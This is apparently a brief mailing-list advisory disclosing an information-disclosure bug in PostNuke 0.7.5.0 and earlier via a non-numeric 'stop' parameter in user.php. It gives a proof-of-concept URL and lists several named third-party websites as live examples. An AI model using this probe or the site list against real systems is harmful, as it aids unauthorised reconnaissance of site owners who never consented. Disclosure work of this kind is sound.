Error PostNuke in the variable stop which can be exploited by malicious
people to disclose system information. Luckily the vulnerability
affects to the 0.7.5.0 version and minors.
POC:
http://www.[web-with-PostNuke].com/user.php?stop=a (no numeric value)
Example:
http://www.dev-postnuke.com/user.php?stop=a
http://www.americavivetv.com/user.php?stop=a
http://www.ciberpsique.net/user.php?stop=a
http://www.bonsaiabm.com/user.php?stop=a
http://www.elrincondejada.net/user.php?stop=a
http://www.salsa.org.pl/user.php?stop=a
http://www.choco.org/user.php?stop=a
by rMrGvG
http://SNI-LABS.com
since 1998
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
